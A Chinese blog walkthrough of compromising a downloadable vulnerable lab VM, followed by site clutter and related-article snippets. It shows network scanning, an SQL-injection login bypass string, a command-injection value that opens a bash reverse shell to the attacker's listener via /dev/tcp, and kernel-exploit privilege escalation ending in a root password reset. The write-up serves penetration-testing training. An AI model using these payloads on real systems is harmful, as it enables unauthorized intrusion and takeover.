kali对未知web server透测试1

最新推荐文章于 2024-05-01 23:14:37 发布
最新推荐文章于 2024-05-01 23:14:37 发布
阅读量4.2w 收藏 1
点赞数 3
分类专栏: kali web 渗透 文章标签: centos shell 安全 mysql linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39583774/article/details/118899253
版权

靶机渗透

主机IP
kali192.168.101.62
靶机未知

靶机探测

靶机下载:https://pan.baidu.com/s/1P8s-ntf05dRSWOg_LrxD_Q
提取码:1234
1.打开靶机
在这里插入图片描述
选择我已移动该虚拟机
在这里插入图片描述

  1. 打开kali进行信息收集
    netdiscover -i eth1 -r 192.168.101.0/24 #探测主机

在这里插入图片描述
因为这里使用的桥接网卡所以可以探测当前路由器连接的所有设备。
这里看名字可以得到虚拟机ip:192.168.101.63
使用nmap探测发现开放80
在这里插入图片描述

  1. 访问web界面
    在这里插入图片描述
    发现登录框,使用弱密码登录失败,使用sql注入。
    万能密码
账号:随便
密码:' OR '1'='1

进入下个界面
命令执行漏洞
在这里插入图片描述

这里应该是命令执行漏洞
在这里插入图片描述
命令执行漏洞是利用Linux一行命令执行多条命令这一特点,使用分号";"、连字符"&、&&"、竖线"||"连接两条命令进行shell反弹。
我们这里尝试使用命令进行查看主机密码
在这里插入图片描述
查看用户配置文件
在这里插入图片描述
尝试查看密码
在这里插入图片描述

权限提升

发现权限不够
这里我们利用漏洞反弹shell
使用kali中的nc工具开一个监听端口
nc -lvp 5555
在这里插入图片描述

在web界面执行
127.0.0.1;bash -i >& /dev/tcp/192.168.101.62/5555 0>&1

在这里插入图片描述

在这里插入图片描述
这里成功反弹shell
在这里插入图片描述
执行命令查看当前Linux版本,到网上寻找提权脚本。
linux 2.6.9-55.el i686 exploit
在这里插入图片描述

在这里插入图片描述
在kali中新建一个shell
开启apache2并把提权脚本放入web目录下
在这里插入图片描述
然后使用反弹的shell进行下载提权脚本到靶机内

因为tmp目录权限较高,进入tmp目录下载提权脚本。在这里插入图片描述
进行编译提权
在这里插入图片描述
修改root密码实现ssh登录
在这里插入图片描述
使用ssh工具连接
在这里插入图片描述
在这里插入图片描述
连接成功,成功渗透。

安恬之心
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Web测试使用Kali Linux
08-15
Kali Linux是专业的渗测试安全审计工具,是世界上最流行的开源渗工具包BackTrack的继任者。本书是市面上第一本全面深入讲解Kali Linux工具包的专著,它注重实战、通俗易懂,强调换位思考,主张积极防御,是学习Kali Linux与渗测试的必读之作。
Kali测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 3355
Kali测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
记一次内网渗测试实训总结
qq_36410265的博客
06-20 3621
时间很快就来到了学期的最后一个月,和上学期一样,最后的几周是实训周,而这次实训恰好就是我比较喜欢的网络攻防,因为之前学过相关的知识,做过一些靶场,相比于其他同学做起来要快些,不过内网渗也还是头一次,得益于这次的内网渗靶场环境,小小地体验了一下,期间也踩了许多坑,也陆陆续续地解决掉了。所以就以本篇文章做个总结,目的在于梳理所学到地知识点和分享。物理机 (win 10) ip:172.20.10.1工具:、攻击机(kali) ip:172.20.10.129工具:、、、、、 …靶场拓扑图首先需要拿到...
Kali Linux Web测试秘籍 中文版.zip
05-12
Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版 Kali Linux Web测试秘籍 中文版
Kali Linux Web测试秘籍
09-26
Kali Linux Web测试秘籍Kali Linux Web测试秘籍Kali Linux Web测试秘籍Kali Linux Web测试秘籍Kali Linux Web测试秘籍 Kali Linux Web测试秘籍
kali未知web server测试2
热门推荐
信安是不可或缺的一部分!
07-23 4万+
环境介绍 主机 IP(NAT) kali 192.168.252.128 靶机2 未知 靶机下载:https://pan.baidu.com/s/1u5xbmU13wheXE4_M508qFw 提取码:1234 打开靶机 主机探测 NAT网卡位于192.168.252.0/24网段 进行主机探测 netdiscover -i eth0 -r 192.168.252.0/24 信息收集 访问web界面 没有发现可疑渗点,这里使用目录爆破,看一下有没有隐藏界面。 d
vulnhub EvilBox: One
箭雨镜屋
04-25 1420
nmap扫描----gobuster爆破网站目录----ffuf爆破url参数----利用本地文件包含找到用户名和id_rsa----ssh2john+john爆破id_rsa的passphrase----linpeas.sh发现/etc/passwd可写----openssl生成新用户密码hash----将root权限新用户写入/etc/passwd----切换到新用户获得root权限
网络基础三层-ipv4
网络重启工程师的博客
06-15 597
ip层 报文 Type of Service:服务类型,网络层Qos。 Total Length:ip数据的字节数。 Identification标识,Flags,Fragment Offset:整层用于数据包的分片和重组。 TTL:Time to Live,数据每经过一次三层转发,TTL值-1,当TTL=0时数据包会被丢弃,(总长度,8bit,<0~2...
Web测试使用kali linux
05-20
web环境下使用kali linux进行渗测试Web是目前最普遍和主流的入侵通道。
Web测试 使用Kali Linux
06-15
使用kali linuxweb的经典书籍,外文书籍中文翻译。
Kali web测试
cnm1131627的博客
11-08 313
形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。所学信息安全技术中也知道XSS攻击所带来的危害很大,所以大家注意防范禁止做违反法律的事。7.从Web存储中提取信息从Web存储中提取信息指的是从浏览器的本地存储(例如cookies、localStorage或sessionStorage)中获取敏感信息或凭据的过程。攻击者可以通过各种手段来获取这些信息,包括利用XSS漏洞、利用恶意软件、进行社交工程等。
使用 Kali Linux 进行 Web测试
A1_3_9_7的博客
12-21 1225
另一个巧妙的用途是注入 SQL 查询,使得查询最终为SELECT * from accounts where user=‘admin’ and password=‘wrong_password’ or 1=1,这可能会以管理员身份登录我们,而根本不知道密码,因为如果查询评估 1 为,则 and 语句中的第二种情况将为 True等于 1。与 Kali Linux 上的大多数工具一样,Knock 是开源的,可以在。在尝试使用工具之前,只需浏览网站并感受一下,寻找功能中的漏洞,特别是网站是否允许上传。
搭建基础镜像(centos+jdk)
ttyy1112的专栏
04-30 623
事先下载jdk安装包并保存到本地
CentOS系统如何设置系统默认语言以及命令行输出的语言为英文? locale
最新发布
技术札记
05-01 337
chatGPT答案,比较准确和全面,实测有效。
Centos 安装docker
qq_44721738的博客
04-30 500
【代码】Centos 安装docker。
CentOS-Stream-9配置网络和web控制台cockpit
好记性不如烂笔头
05-01 271
vim /etc/NetworkManager/system-connections/ens33.nmconnection,修改autoconnection=true自动连接网络,可以自动获取IP地址,或者设置固定IP地址,在[ipv4]下面编辑method=manual和address1=192.168.4.111/24,192.168.4.1和dns=223.5.5.5;systemctl enable --now cockpit.socket设置开机启动和立即启动cockpit。
nginx在CentOS系统安装
m0_49067926的博客
04-30 325
通过使用EPEL,您可以访问大量的开源软件包,包括Web服务器、数据库、开发工具、版本控制系统、网络安全工具等等。如果状态显示为active (running),则表示安装成功。6.确认Nginx是否成功安装并运行。9.nginx配置文件存放位置。5.设置Nginx开机自启动。7.查询nginx访问日志。8.html文件存放位置。1.更新系统软件包列表。2.安装EPEL存储库。4.启动Nginx服务。
MySQL8.0版本在CentOS系统安装(2024最新版)
m0_49067926的博客
04-30 837
默认情况下,root用户是不运行远程登录的,只允许在MySQL所在的Linux服务器登陆MySQL系统。请注意,此配置仅仅是用于测试环境或学习环境的MySQL,如果是正式使用,请勿设置简单密码。MySQL默认绑定了3306端口,可以通过端口占用检查MySQL的网络状态。至此,MySQL就安装完成并可用了,请妥善保存好MySQL的root密码。安装完成后,启动MySQL并配置开机自启动。请注意,允许root远程登录会带来安全风险。允许root远程登录,并设置远程登录密码。[扩展],配置root的简单密码。
kali能对web做什么安全测试?及具体的测试方法
06-14
Kali Linux 是一款专门用于渗测试安全审计的操作系统,它可以用来测试 Web 应用程序的安全性。以下是一些常用的测试方法: 1.信息收集:使用 Kali Linux 中的工具,如 Nmap、Recon-ng、Wafw00f 等,获取目标 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安恬之心

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值